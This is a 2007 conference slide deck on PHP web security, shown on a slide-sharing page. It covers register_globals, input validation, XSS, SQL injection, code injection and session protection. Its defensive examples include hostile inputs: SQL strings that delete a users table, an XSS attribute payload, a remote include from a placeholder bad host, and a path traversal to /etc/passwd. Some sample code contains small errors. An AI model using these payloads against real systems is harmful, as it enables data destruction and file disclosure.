OSSCube, profile picture
Uploaded byOSSCube
PPT, PDF1,576 views

Php Security By Mugdha And Anish

The document discusses various aspects of PHP security, highlighting the importance of proper input validation, session security, and preventing common vulnerabilities such as SQL injection and cross-site scripting (XSS). It outlines best practices for securing PHP applications, including using prepared statements, disabling dangerous features like register_globals, and ensuring safe session management. Additionally, it covers issues related to shared hosting environments and suggests solutions to mitigate security risks.

Embed presentation

Downloaded 147 times
OSScamp, Impetus Noida, Sept,’07 Anish & Mugdha Value One InfoTech
Topics of Discussion  Importance of PHP Security  Concerns of PHP Security  Input Validation  Cross-Site Scripting  SQL Injection  Code Injection  Session Security  Shared Hosting
Importance of PHP Security  PHP is widely used language for web applications  PHP is making headway into enterprise as well as corporate markets.  Most effective & often overlooked measure to prevent malicious users  PHP applications often end up working with sensitive data.
Input Validation  All user inputs are unreliable and can’t be trusted.  Need for validating any user input before use :  Unexpected Modification by the user  Intentional attempt to gain unauthorized access to the application  Attempt to crash the application by the malicious users
Register Globals  Most common source of vulnerabilities in PHP applications.  Any input parameters are translated to variables :- ?foo=bar >> $foo = “bar”;  No way to determine the input source.  Prioritized sources like cookies can overwrite GET values.  When register global is set ON, un-initialized variables can be “injected” via user inputs.
Solutions To Register Globals  Disable register_globals in PHP.ini (Disabled by-default as of PHP 4.2.0)  Alternative to Register Global : SUPER GLOBALS  $_GET – data from get requests.  $_POST – post request data.  $_COOKIE – cookie information.  $_FILES – uploaded file data.  $_SERVER – server data  $_ENV – environment variables  $_REQUEST – mix of GET, POST, COOKIE
Contd…  Type sensitive validation conditions.  Because input is always a string, type sensitive compare to a Boolean or an integer will always fail.  Example if ($authorized === TRUE) { // LOGIN SUCCESS }
Contd…  Code with error_reporting set to E_ALL.  Allows you to see warnings about the use of un-initialized variables.  Use of constants  Created via define() function  Once set, remains defined until end of request  Can be made case-insensitive to avoid accidental access to a different datum caused by case variance.
Cons of $ REQUEST  Suffers from the loss of data problem, caused when the same parameter is provided by multiple input sources.  PHP.ini: variables_order = GPCS (Last data source has highest priority)  Example echo $_GET['id']; // 1 echo $_COOKIE['id']; // 2 echo $_REQUEST['id']; // 2  Use the input method-specific superglobals intead of $_REQUEST
Numeric Data Validation  All data passed to PHP (GET/POST/COOKIE) ends up being a string. Using strings where integers are needed is not only inefficient but also dangerous.  Casting is a simple and very efficient way to ensure that variables contain numeric values.  Example of floating point number validation if (!empty($_GET['price'])) { $price = (float) $_GET['price']; } else $price = 0;
String Validation  PHP comes with a ctype, extension that offers a very quick mechanism for validating string content. if (!ctype_alnum($_GET['login'])) { echo "Only A-Za-z0-9 are allowed."; } if (!ctype_alpha($_GET['captcha'])) { echo "Only A-Za-z are allowed."; } if (!ctype_xdigit($_GET['color'])) { echo "Only hexadecimal values are allowed"; }
Using Magic Quotes  What are Magic Quotes ??  Problems associated with it !!  How to deal with it ??
Cross Site Scripting (XSS)  Cross Site Scripting (XSS) is a situation where by attacker injects HTML code, which is then displayed on the page without further validation.  Can lead to embarrassment  Session take-over  Password theft  User tracking by 3rd parties
Preventing XSS  Prevention of XSS is as simple as filtering input data via one of the following:  htmlspecialchars() Encodes ‘, “, <, >, &  htmlentities() Convert anything that there is HTML entity for.  strip_tags() Strips anything that resembles HTML tag.  Tag allowances in strip_tags() are dangerous, because attributes of those tags are not being validated in any way.
Preventing XSS  $str = strip_tags($_POST['message']);  // encode any foreign & special chars $str = htmlentities($str);  // strip tags can be told to "keep" certain tags $str = strip_tags($_POST['message'], '<b><p><i><u>');  // tag allowance problems <u onmouseover="alert('JavaScript is allowed');"> <b style="font-size: 500px">Lot's of text</b> </u>
SQL Injection  SQL injection is similar to XSS, in the fact that not validated data is being used. But in this case this data is passed to the database.  Arbitrary query execution  Removal of data.  Modification of existing values.  Denial of service.  Arbitrary data injection.  // consider this query, it will delete all records from users $name = “mugdha’; DELETE FROM users;”; mysql_query(“SELECT * FROM users WHERE name =’{$name}’”);
SQL Escaping  If your database extension offers a specific escaping function then always use it; instead of other methods  MySQL  mysql_escape_string()  mysql_real_escape_string()  PostgreSQL  pg_escape_string()  pg_escape_bytea()  SQLite  sqlite_escape_string()
SQL Escaping in Practice  // undo magic_quotes_gpc to avoid double escaping if (get_magic_quotes_gpc()) { $_GET['name'] = stripslashes($_GET['name']; $_POST['binary'] = stripslashes($_GET['binary']); } $name = pg_escape_string($_GET['name']); $binary = pg_escape_bytea($_POST['binary']); pg_query($db, "INSERT INTO tbl (name,image) VALUES('{$name}', '{$image}')");
Escaping Shortfall  When un-quoted integers are passed to SQL queries, escaping functions won’t save you, since there are no special chars to escape.  http://example.com/db.php?id=0;DELETE%20FROM%20users  <?php $id = sqlite_escape_string($_GET['id']); // $id is still 0;DELETE FROM users sqlite_query($db,"SELECT * FROM users WHERE id={$id}"); // Bye Bye user data... ?>
Prepared Statements  Prepared statements are a mechanism to secure and optimize execution of repeated queries.  Works by making SQL “compile” the query and then substitute in the changing values for each execution.  Increased performance, one compile vs one per query.  Better security, data is “type set” will never be evaluated as separate query.  Supported by most database systems.  MySQL users will need to use version 4.1 or higher.  SQLite extension does not support this either.
Prepared Statements  <?php $data = "Here is some text to index"; pg_query($db, "PREPARE my_stmt (text) AS INSERT INTO search_idx (word) VALUES($1)"); foreach (explode(" ", $data) as $word) {// no is escaping needed pg_query($db, "EXECUTE my_stmt({$word})"); } // de-allocte the prepared statement pg_query($db, "DEALLOCATE my_stmt"); ?> Unless explicitly removed, prepared statements “stay alive” between persistent connections.
Code Injection  Code Injection is the execution of arbitrary local or remote code.  The two of the most common sources of code injection are:  Dynamic paths/files used in require/include statements  eval(): A major source of code injection is the improper validation of eval().
Code Injection Prevention  Avoid using dynamic or relative paths/files in your code. Although somewhat less convenient; always use full paths, defined by constants, which will prevent attacks like these:  <?php //dynamic path $_GET['path'] = ‘http://bad_site.org’; include "{$_GET['path']}/header.inc"; //dynamic file $_GET[‘interface’] = ‘../../../../../etc/passwd’; require‘home/mbr/profile/templates_c/interfaces/’.$_GET[‘interface’]; ?>  There are some other ways to secure include or require calls...
Code Injection Prevention  work with a white-list of acceptable values. //create an array of acceptable file names $tmpl = array(); foreach(glob("templates/*.tmpl") as $v) { $tmpl[md5($v)] = $v; } if (isset($tmpl[$_GET['path']])) { $fp = fopen($tmpl[$_GET['path']], "r"); }
Session Security  Sessions are a common tool for user tracking across a web site.  For the duration of a visit, the session is effectively the user’s identity.  If an active session can be obtained by 3rd party, it can assume the identity of the user who’s session was compromised.
Securing Session ID  To prevent session id theft, the id can be altered on every request, invalidating old values. <?php session_start(); if (!empty($_SESSION)) { // not a new session session_regenerate_id(TRUE); // make new session id } ?>  Because the session changes on every request, the “back” button in a browser will no longer work, as it will make a request with the old session id.
Session Validation  Another session security technique is to compare the browser signature headers. session_start(); $chk = @md5( $_SERVER['HTTP_ACCEPT_CHARSET'] . $_SERVER['HTTP_ACCEPT_ENCODING'] . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . $_SERVER['HTTP_USER_AGENT']); if (empty($_SESSION)) $_SESSION['key'] = $chk; else if ($_SESSION['key'] != $chk) session_destroy();
Safer Session Storage  By default PHP sessions are stored as files inside the common / tmp directory.  This often means any user on the system could see active sessions and “acquire” them or even modify their content.  Solutions?  Separate session storage directory via session.save_path  Database storage mechanism, mysql, pgsql, oci, sqlite.  Custom session handler allowing data storage anywhere.
Shared Hosting  Most PHP applications run in shared environments where all users “share” the same web server instances.  This means that all files that are involved in serving content must be accessible to the web server (world readable).  Consequently it means that any user could read the content of files of all other users.
The PHP Solution  PHP’s solution to this problem are 2 php.ini directives.  open_basedir – limits file access to one or more specified directories.  Relatively Efficient.  Uncomplicated.  safe_mode – limits file access based on uid/gid of running script and file to be accessed.  Slow and complex approach.  Can be bypassed with little effort.
References  php|architect’s Guide to PHP Security  By Ilia Alshanetsky  Essential PHP Security  By Chris Shiflett
T hank you! For more information, contact us: OSSCube India: +91 995 809 0987 USA: +1 919 791 5427 Web: www.osscube.com Mail: info@osscube.com

More Related Content

PDF
Php Security
byguest7cf35c
 
KEY
PHP security audits
byDamien Seguy
 
PPT
PHP Security
byMindfire Solutions
 
PPS
PHP Security
bymanugoel2003
 
PDF
10 Rules for Safer Code
byQuang Ngoc
 
PPS
Php Security3895
byAung Khant
 
PPTX
Let's write secure Drupal code! - DrupalCamp London 2019
byBalázs Tatár
 
ODP
Concern of Web Application Security
byMahmud Ahsan
 
Php Security
byguest7cf35c
 
PHP security audits
byDamien Seguy
 
PHP Security
byMindfire Solutions
 
PHP Security
bymanugoel2003
 
10 Rules for Safer Code
byQuang Ngoc
 
Php Security3895
byAung Khant
 
Let's write secure Drupal code! - DrupalCamp London 2019
byBalázs Tatár
 
Concern of Web Application Security
byMahmud Ahsan
 

What's hot

ODP
My app is secure... I think
byWim Godden
 
PDF
Error Reporting in ZF2: form messages, custom error pages, logging
bySteve Maraspin
 
PPTX
Web Security - Hands-on
byAndrea Valenza
 
PDF
Create a res tful services api in php.
byAdeoye Akintola
 
PPT
Eight simple rules to writing secure PHP programs
byAleksandr Yampolskiy
 
PPT
Jquery presentation
byguest5d87aa6
 
PPTX
Object Oriented Programming Basics with PHP
byDaniel Kline
 
PDF
Dependency Injection with PHP 5.3
byFabien Potencier
 
PDF
Php tips-and-tricks4128
byPrinceGuru MS
 
PDF
New methods for exploiting ORM injections in Java applications
byMikhail Egorov
 
PDF
Introduction to Active Record - Silicon Valley Ruby Conference 2007
byRabble .
 
PDF
Quebec pdo
byRengga Aditya
 
PDF
Proposed PHP function: is_literal()
byCraig Francis
 
PDF
Php Security - OWASP
byMizno Kruge
 
PPTX
Introduction to PHP Lecture 1
byAjay Khatri
 
ODP
My app is secure... I think
byWim Godden
 
PPTX
Basics of Java Script (JS)
byAjay Khatri
 
PPT
Framework
byNguyen Linh
 
PPT
Corephpcomponentpresentation 1211425966721657-8
byPrinceGuru MS
 
My app is secure... I think
byWim Godden
 
Error Reporting in ZF2: form messages, custom error pages, logging
bySteve Maraspin
 
Web Security - Hands-on
byAndrea Valenza
 
Create a res tful services api in php.
byAdeoye Akintola
 
Eight simple rules to writing secure PHP programs
byAleksandr Yampolskiy
 
Jquery presentation
byguest5d87aa6
 
Object Oriented Programming Basics with PHP
byDaniel Kline
 
Dependency Injection with PHP 5.3
byFabien Potencier
 
Php tips-and-tricks4128
byPrinceGuru MS
 
New methods for exploiting ORM injections in Java applications
byMikhail Egorov
 
Introduction to Active Record - Silicon Valley Ruby Conference 2007
byRabble .
 
Quebec pdo
byRengga Aditya
 
Proposed PHP function: is_literal()
byCraig Francis
 
Php Security - OWASP
byMizno Kruge
 
Introduction to PHP Lecture 1
byAjay Khatri
 
My app is secure... I think
byWim Godden
 
Basics of Java Script (JS)
byAjay Khatri
 
Framework
byNguyen Linh
 
Corephpcomponentpresentation 1211425966721657-8
byPrinceGuru MS
 

Viewers also liked

PDF
Advanced Php - Macq Electronique 2010
byMichelangelo van Dam
 
PDF
Advanced PHP: Design Patterns - Dennis-Jan Broerse
bydpc
 
ODP
PHP Web Programming
byMuthuselvam RS
 
PDF
Introduction to PHP
byBradley Holt
 
PPTX
PHP Powerpoint -- Teach PHP with this
byIan Macali
 
PPTX
PHP Advanced
byNoveo
 
PDF
Advanced PHP Simplified
byMark Niebergall
 
PPSX
Advanced PHP Web Development Tools in 2015
byiScripts
 
PDF
Advanced php testing in action
byJace Ju
 
PPSX
DIWE - Advanced PHP Concepts
byRasan Samarasinghe
 
PPT
Php Presentation
byManish Bothra
 
Advanced Php - Macq Electronique 2010
byMichelangelo van Dam
 
Advanced PHP: Design Patterns - Dennis-Jan Broerse
bydpc
 
PHP Web Programming
byMuthuselvam RS
 
Introduction to PHP
byBradley Holt
 
PHP Powerpoint -- Teach PHP with this
byIan Macali
 
PHP Advanced
byNoveo
 
Advanced PHP Simplified
byMark Niebergall
 
Advanced PHP Web Development Tools in 2015
byiScripts
 
Advanced php testing in action
byJace Ju
 
DIWE - Advanced PHP Concepts
byRasan Samarasinghe
 
Php Presentation
byManish Bothra
 

Similar to Php Security By Mugdha And Anish

PPS
Php security3895
byPrinceGuru MS
 
PPT
Php & Web Security - PHPXperts 2009
bymirahman
 
PDF
Intro to Php Security
byDave Ross
 
PPT
Security.ppt
bywebhostingguy
 
PPT
12-security.ppt - PHP and Arabic Language - Index
bywebhostingguy
 
PPT
PHPUG Presentation
byDamon Cortesi
 
PDF
Security in PHP Applications: An absolute must!
byMark Niebergall
 
ODP
My app is secure... I think
byWim Godden
 
PDF
null Bangalore meet - Php Security
byn|u - The Open Security Community
 
PDF
Security 202 - Are you sure your site is secure?
byConFoo
 
PDF
Http and security
byNikola Milosevic
 
PPT
Php My Sql Security 2007
byAung Khant
 
ODP
Security In PHP Applications
byAditya Mooley
 
PDF
PHP Secure Programming
byBalavignesh Kasinathan
 
PDF
Secure PHP Coding
byNarudom Roongsiriwong, CISSP
 
PDF
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
byFelipe Prado
 
PDF
My app is secure... I think
byWim Godden
 
PPT
Php security
byKarthik Vikarm
 
PPTX
Secure Programming In Php
byAkash Mahajan
 
PPTX
Secure programming with php
byMohmad Feroz
 
Php security3895
byPrinceGuru MS
 
Php & Web Security - PHPXperts 2009
bymirahman
 
Intro to Php Security
byDave Ross
 
Security.ppt
bywebhostingguy
 
12-security.ppt - PHP and Arabic Language - Index
bywebhostingguy
 
PHPUG Presentation
byDamon Cortesi
 
Security in PHP Applications: An absolute must!
byMark Niebergall
 
My app is secure... I think
byWim Godden
 
null Bangalore meet - Php Security
byn|u - The Open Security Community
 
Security 202 - Are you sure your site is secure?
byConFoo
 
Http and security
byNikola Milosevic
 
Php My Sql Security 2007
byAung Khant
 
Security In PHP Applications
byAditya Mooley
 
PHP Secure Programming
byBalavignesh Kasinathan
 
Secure PHP Coding
byNarudom Roongsiriwong, CISSP
 
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
byFelipe Prado
 
My app is secure... I think
byWim Godden
 
Php security
byKarthik Vikarm
 
Secure Programming In Php
byAkash Mahajan
 
Secure programming with php
byMohmad Feroz
 

More from OSSCube

PPTX
High Availability Using MySQL Group Replication
byOSSCube
 
PPTX
Accelerate Your Digital Transformation Journey with Pimcore
byOSSCube
 
PPTX
Migrating Legacy Applications to AWS Cloud: Strategies and Challenges
byOSSCube
 
PPTX
Why Does Omnichannel Experience Matter to Your Customers
byOSSCube
 
PPTX
Using MySQL Fabric for High Availability and Scaling Out
byOSSCube
 
PPTX
Webinar: Five Ways a Technology Refresh Strategy Can Help Make Your Digital T...
byOSSCube
 
PPTX
Cutting Through the Disruption
byOSSCube
 
PPTX
Legacy to industry leader: a modernization case study
byOSSCube
 
PPTX
Marketing and Sales together at last
byOSSCube
 
PPTX
Using pim to maximize revenue and improve customer satisfaction
byOSSCube
 
PPTX
Talend for the Enterprise
byOSSCube
 
PPTX
Ahead of the Curve
byOSSCube
 
PPTX
Non functional requirements. do we really care…?
byOSSCube
 
PPTX
Learning from experience: Collaborative Journey towards CMMI
byOSSCube
 
PPTX
Exploiting JXL using Selenium
byOSSCube
 
PPTX
Introduction to AWS
byOSSCube
 
PPTX
Maria DB Galera Cluster for High Availability
byOSSCube
 
PDF
Talend Open Studio Introduction - OSSCamp 2014
byOSSCube
 
PDF
Performance Testing Session - OSSCamp 2014
byOSSCube
 
PDF
Job Queue Presentation - OSSCamp 2014
byOSSCube
 
High Availability Using MySQL Group Replication
byOSSCube
 
Accelerate Your Digital Transformation Journey with Pimcore
byOSSCube
 
Migrating Legacy Applications to AWS Cloud: Strategies and Challenges
byOSSCube
 
Why Does Omnichannel Experience Matter to Your Customers
byOSSCube
 
Using MySQL Fabric for High Availability and Scaling Out
byOSSCube
 
Webinar: Five Ways a Technology Refresh Strategy Can Help Make Your Digital T...
byOSSCube
 
Cutting Through the Disruption
byOSSCube
 
Legacy to industry leader: a modernization case study
byOSSCube
 
Marketing and Sales together at last
byOSSCube
 
Using pim to maximize revenue and improve customer satisfaction
byOSSCube
 
Talend for the Enterprise
byOSSCube
 
Ahead of the Curve
byOSSCube
 
Non functional requirements. do we really care…?
byOSSCube
 
Learning from experience: Collaborative Journey towards CMMI
byOSSCube
 
Exploiting JXL using Selenium
byOSSCube
 
Introduction to AWS
byOSSCube
 
Maria DB Galera Cluster for High Availability
byOSSCube
 
Talend Open Studio Introduction - OSSCamp 2014
byOSSCube
 
Performance Testing Session - OSSCamp 2014
byOSSCube
 
Job Queue Presentation - OSSCamp 2014
byOSSCube
 

Recently uploaded

PDF
Chapter 5 Security Mechanisms iin computer security.pdf
byGetnet Tigabie Askale -(GM)
 
PDF
February 2026 Patch Tuesday hosted by Chris Goettl and Todd Schell
byIvanti
 
PDF
Security-Fails-in-the-Gaps-Between-Systems.pptx.pdf
byOhhproJunction
 
PPTX
apidays Paris 2025 | Integration is Feminist: Building Peace in Distributed S...
byapidays
 
PDF
Post Quantum Cryptography for Dummies.pdf
byAde Ismail Isnan
 
PDF
Python Automation in Action: Real-World Use Cases and Practical Implementation
byDenys Smirnov
 
PDF
How to Prepare for the RWA Tokenization Trend
byrose mason
 
PDF
Escape from the Forbidden Zone: Smuggling green and inclusive tech past the g...
byBookNet Canada
 
PDF
Poročilo odbora CIS (CH08873) za leto 2025 na letni skupščini IEEE Slovenija ...
byUniversity of Maribor
 
PDF
Safer’s Picks: The 5 FME Transformers You Didn’t Know You Needed
bySafe Software
 
PDF
UiPath Automation Developer Associate Training Series 2026 - Session 2
byDianaGray10
 
PDF
Automated Governance for FME Flow: Smarter Admin at Scale
bySafe Software
 
PDF
final.pdf
byomarbishtawi04
 
PPTX
Computer architecture, Computer architecture ,Computer architecture
bywaheedqazi123
 
PDF
Odoo Implementation Checklist: A Strategic ERP Blueprint for Business-Ready D...
byBANIBRO IT SOLUTION
 
PDF
Session 1/5: Enhancing Automation with Screenplay & Business Rules
bysuhanisingh58689
 
PDF
NTG -Company Profile_Software_Vendor_Company_in_MENA
byMustafa Kuğu
 
PPTX
TravelTech Paris 2025 | Beyond the pipes: Why Channel Management isn’t really...
byapidays
 
PDF
Rustici Software: eLearning standards in the age of AI
byRustici Software
 
PPTX
How Does an ICO Launchpad Work Step-by-Step Breakdown.pptx
byTom Hardy S
 
Chapter 5 Security Mechanisms iin computer security.pdf
byGetnet Tigabie Askale -(GM)
 
February 2026 Patch Tuesday hosted by Chris Goettl and Todd Schell
byIvanti
 
Security-Fails-in-the-Gaps-Between-Systems.pptx.pdf
byOhhproJunction
 
apidays Paris 2025 | Integration is Feminist: Building Peace in Distributed S...
byapidays
 
Post Quantum Cryptography for Dummies.pdf
byAde Ismail Isnan
 
Python Automation in Action: Real-World Use Cases and Practical Implementation
byDenys Smirnov
 
How to Prepare for the RWA Tokenization Trend
byrose mason
 
Escape from the Forbidden Zone: Smuggling green and inclusive tech past the g...
byBookNet Canada
 
Poročilo odbora CIS (CH08873) za leto 2025 na letni skupščini IEEE Slovenija ...
byUniversity of Maribor
 
Safer’s Picks: The 5 FME Transformers You Didn’t Know You Needed
bySafe Software
 
UiPath Automation Developer Associate Training Series 2026 - Session 2
byDianaGray10
 
Automated Governance for FME Flow: Smarter Admin at Scale
bySafe Software
 
final.pdf
byomarbishtawi04
 
Computer architecture, Computer architecture ,Computer architecture
bywaheedqazi123
 
Odoo Implementation Checklist: A Strategic ERP Blueprint for Business-Ready D...
byBANIBRO IT SOLUTION
 
Session 1/5: Enhancing Automation with Screenplay & Business Rules
bysuhanisingh58689
 
NTG -Company Profile_Software_Vendor_Company_in_MENA
byMustafa Kuğu
 
TravelTech Paris 2025 | Beyond the pipes: Why Channel Management isn’t really...
byapidays
 
Rustici Software: eLearning standards in the age of AI
byRustici Software
 
How Does an ICO Launchpad Work Step-by-Step Breakdown.pptx
byTom Hardy S
 

Php Security By Mugdha And Anish

  • 1.
    OSScamp, Impetus Noida,Sept,’07 Anish & Mugdha Value One InfoTech
  • 2.
    Topics of Discussion  Importance of PHP Security  Concerns of PHP Security  Input Validation  Cross-Site Scripting  SQL Injection  Code Injection  Session Security  Shared Hosting
  • 3.
    Importance of PHPSecurity  PHP is widely used language for web applications  PHP is making headway into enterprise as well as corporate markets.  Most effective & often overlooked measure to prevent malicious users  PHP applications often end up working with sensitive data.
  • 5.
    Input Validation  All user inputs are unreliable and can’t be trusted.  Need for validating any user input before use :  Unexpected Modification by the user  Intentional attempt to gain unauthorized access to the application  Attempt to crash the application by the malicious users
  • 6.
    Register Globals  Most common source of vulnerabilities in PHP applications.  Any input parameters are translated to variables :- ?foo=bar >> $foo = “bar”;  No way to determine the input source.  Prioritized sources like cookies can overwrite GET values.  When register global is set ON, un-initialized variables can be “injected” via user inputs.
  • 7.
    Solutions To RegisterGlobals  Disable register_globals in PHP.ini (Disabled by-default as of PHP 4.2.0)  Alternative to Register Global : SUPER GLOBALS  $_GET – data from get requests.  $_POST – post request data.  $_COOKIE – cookie information.  $_FILES – uploaded file data.  $_SERVER – server data  $_ENV – environment variables  $_REQUEST – mix of GET, POST, COOKIE
  • 8.
    Contd…  Type sensitive validation conditions.  Because input is always a string, type sensitive compare to a Boolean or an integer will always fail.  Example if ($authorized === TRUE) { // LOGIN SUCCESS }
  • 9.
    Contd…  Code with error_reporting set to E_ALL.  Allows you to see warnings about the use of un-initialized variables.  Use of constants  Created via define() function  Once set, remains defined until end of request  Can be made case-insensitive to avoid accidental access to a different datum caused by case variance.
  • 10.
    Cons of $REQUEST  Suffers from the loss of data problem, caused when the same parameter is provided by multiple input sources.  PHP.ini: variables_order = GPCS (Last data source has highest priority)  Example echo $_GET['id']; // 1 echo $_COOKIE['id']; // 2 echo $_REQUEST['id']; // 2  Use the input method-specific superglobals intead of $_REQUEST
  • 11.
    Numeric Data Validation  All data passed to PHP (GET/POST/COOKIE) ends up being a string. Using strings where integers are needed is not only inefficient but also dangerous.  Casting is a simple and very efficient way to ensure that variables contain numeric values.  Example of floating point number validation if (!empty($_GET['price'])) { $price = (float) $_GET['price']; } else $price = 0;
  • 12.
    String Validation  PHP comes with a ctype, extension that offers a very quick mechanism for validating string content. if (!ctype_alnum($_GET['login'])) { echo "Only A-Za-z0-9 are allowed."; } if (!ctype_alpha($_GET['captcha'])) { echo "Only A-Za-z are allowed."; } if (!ctype_xdigit($_GET['color'])) { echo "Only hexadecimal values are allowed"; }
  • 13.
    Using Magic Quotes What are Magic Quotes ??  Problems associated with it !!  How to deal with it ??
  • 15.
    Cross Site Scripting(XSS)  Cross Site Scripting (XSS) is a situation where by attacker injects HTML code, which is then displayed on the page without further validation.  Can lead to embarrassment  Session take-over  Password theft  User tracking by 3rd parties
  • 16.
    Preventing XSS  Preventionof XSS is as simple as filtering input data via one of the following:  htmlspecialchars() Encodes ‘, “, <, >, &  htmlentities() Convert anything that there is HTML entity for.  strip_tags() Strips anything that resembles HTML tag.  Tag allowances in strip_tags() are dangerous, because attributes of those tags are not being validated in any way.
  • 17.
    Preventing XSS  $str= strip_tags($_POST['message']);  // encode any foreign & special chars $str = htmlentities($str);  // strip tags can be told to "keep" certain tags $str = strip_tags($_POST['message'], '<b><p><i><u>');  // tag allowance problems <u onmouseover="alert('JavaScript is allowed');"> <b style="font-size: 500px">Lot's of text</b> </u>
  • 19.
    SQL Injection  SQL injection is similar to XSS, in the fact that not validated data is being used. But in this case this data is passed to the database.  Arbitrary query execution  Removal of data.  Modification of existing values.  Denial of service.  Arbitrary data injection.  // consider this query, it will delete all records from users $name = “mugdha’; DELETE FROM users;”; mysql_query(“SELECT * FROM users WHERE name =’{$name}’”);
  • 20.
    SQL Escaping  Ifyour database extension offers a specific escaping function then always use it; instead of other methods  MySQL  mysql_escape_string()  mysql_real_escape_string()  PostgreSQL  pg_escape_string()  pg_escape_bytea()  SQLite  sqlite_escape_string()
  • 21.
    SQL Escaping inPractice  // undo magic_quotes_gpc to avoid double escaping if (get_magic_quotes_gpc()) { $_GET['name'] = stripslashes($_GET['name']; $_POST['binary'] = stripslashes($_GET['binary']); } $name = pg_escape_string($_GET['name']); $binary = pg_escape_bytea($_POST['binary']); pg_query($db, "INSERT INTO tbl (name,image) VALUES('{$name}', '{$image}')");
  • 22.
    Escaping Shortfall  Whenun-quoted integers are passed to SQL queries, escaping functions won’t save you, since there are no special chars to escape.  http://example.com/db.php?id=0;DELETE%20FROM%20users  <?php $id = sqlite_escape_string($_GET['id']); // $id is still 0;DELETE FROM users sqlite_query($db,"SELECT * FROM users WHERE id={$id}"); // Bye Bye user data... ?>
  • 23.
    Prepared Statements  Preparedstatements are a mechanism to secure and optimize execution of repeated queries.  Works by making SQL “compile” the query and then substitute in the changing values for each execution.  Increased performance, one compile vs one per query.  Better security, data is “type set” will never be evaluated as separate query.  Supported by most database systems.  MySQL users will need to use version 4.1 or higher.  SQLite extension does not support this either.
  • 24.
    Prepared Statements  <?php $data = "Here is some text to index"; pg_query($db, "PREPARE my_stmt (text) AS INSERT INTO search_idx (word) VALUES($1)"); foreach (explode(" ", $data) as $word) {// no is escaping needed pg_query($db, "EXECUTE my_stmt({$word})"); } // de-allocte the prepared statement pg_query($db, "DEALLOCATE my_stmt"); ?> Unless explicitly removed, prepared statements “stay alive” between persistent connections.
  • 26.
    Code Injection  CodeInjection is the execution of arbitrary local or remote code.  The two of the most common sources of code injection are:  Dynamic paths/files used in require/include statements  eval(): A major source of code injection is the improper validation of eval().
  • 27.
    Code Injection Prevention  Avoid using dynamic or relative paths/files in your code. Although somewhat less convenient; always use full paths, defined by constants, which will prevent attacks like these:  <?php //dynamic path $_GET['path'] = ‘http://bad_site.org’; include "{$_GET['path']}/header.inc"; //dynamic file $_GET[‘interface’] = ‘../../../../../etc/passwd’; require‘home/mbr/profile/templates_c/interfaces/’.$_GET[‘interface’]; ?>  There are some other ways to secure include or require calls...
  • 28.
    Code Injection Prevention work with a white-list of acceptable values. //create an array of acceptable file names $tmpl = array(); foreach(glob("templates/*.tmpl") as $v) { $tmpl[md5($v)] = $v; } if (isset($tmpl[$_GET['path']])) { $fp = fopen($tmpl[$_GET['path']], "r"); }
  • 30.
    Session Security  Sessions are a common tool for user tracking across a web site.  For the duration of a visit, the session is effectively the user’s identity.  If an active session can be obtained by 3rd party, it can assume the identity of the user who’s session was compromised.
  • 31.
    Securing Session ID To prevent session id theft, the id can be altered on every request, invalidating old values. <?php session_start(); if (!empty($_SESSION)) { // not a new session session_regenerate_id(TRUE); // make new session id } ?>  Because the session changes on every request, the “back” button in a browser will no longer work, as it will make a request with the old session id.
  • 32.
    Session Validation  Anothersession security technique is to compare the browser signature headers. session_start(); $chk = @md5( $_SERVER['HTTP_ACCEPT_CHARSET'] . $_SERVER['HTTP_ACCEPT_ENCODING'] . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . $_SERVER['HTTP_USER_AGENT']); if (empty($_SESSION)) $_SESSION['key'] = $chk; else if ($_SESSION['key'] != $chk) session_destroy();
  • 33.
    Safer Session Storage By default PHP sessions are stored as files inside the common / tmp directory.  This often means any user on the system could see active sessions and “acquire” them or even modify their content.  Solutions?  Separate session storage directory via session.save_path  Database storage mechanism, mysql, pgsql, oci, sqlite.  Custom session handler allowing data storage anywhere.
  • 35.
    Shared Hosting  Most PHP applications run in shared environments where all users “share” the same web server instances.  This means that all files that are involved in serving content must be accessible to the web server (world readable).  Consequently it means that any user could read the content of files of all other users.
  • 36.
    The PHP Solution PHP’s solution to this problem are 2 php.ini directives.  open_basedir – limits file access to one or more specified directories.  Relatively Efficient.  Uncomplicated.  safe_mode – limits file access based on uid/gid of running script and file to be accessed.  Slow and complex approach.  Can be bypassed with little effort.
  • 37.
    References  php|architect’s Guideto PHP Security  By Ilia Alshanetsky  Essential PHP Security  By Chris Shiflett
  • 38.
    T hank you! Formore information, contact us: OSSCube India: +91 995 809 0987 USA: +1 919 791 5427 Web: www.osscube.com Mail: info@osscube.com